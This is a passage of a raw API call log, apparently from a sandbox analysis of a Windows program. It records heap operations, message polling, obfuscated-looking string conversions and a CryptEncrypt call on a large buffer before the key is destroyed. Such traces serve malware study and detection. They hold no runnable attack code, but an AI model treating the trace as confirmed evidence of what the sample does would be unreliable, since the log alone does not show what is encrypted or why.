returned 0x34a2080 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0261.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.418] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xfecf, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xfed0) returned 1 [0261.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.418] CharLowerBuffW (in: lpsz="byte[65232]", cchLength=0xb | out: lpsz="byte[65232]") returned 0xb [0261.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.421] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.421] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.421] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.422] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xfecf, dwBufLen=0xfed0 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xfed0) returned 1 [0261.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.424] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.424] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.424] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.424] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.425] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.425] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.425] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.425] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.425] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.425] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.425] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.425] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.425] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.425] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.425] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.425] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.425] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.425] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.425] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.434] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0261.434] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.434] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0261.434] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.434] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.434] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.434] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.435] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.435] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.435] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.435] CryptDestroyKey (hKey=0xaa5760) returned 1 [0261.435] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.435] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.435] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.435] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.435] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.435] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.435] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.435] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.436] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.436] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.436] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.436] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.436] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.436] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.437] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.437] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.437] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.437] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.437] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.437] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.437] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.437] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.437] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.437] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.438] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.438] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.438] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.438] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.438] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.438] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.438] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.438] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.438] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.438] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.438] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.438] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.438] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.438] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.439] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 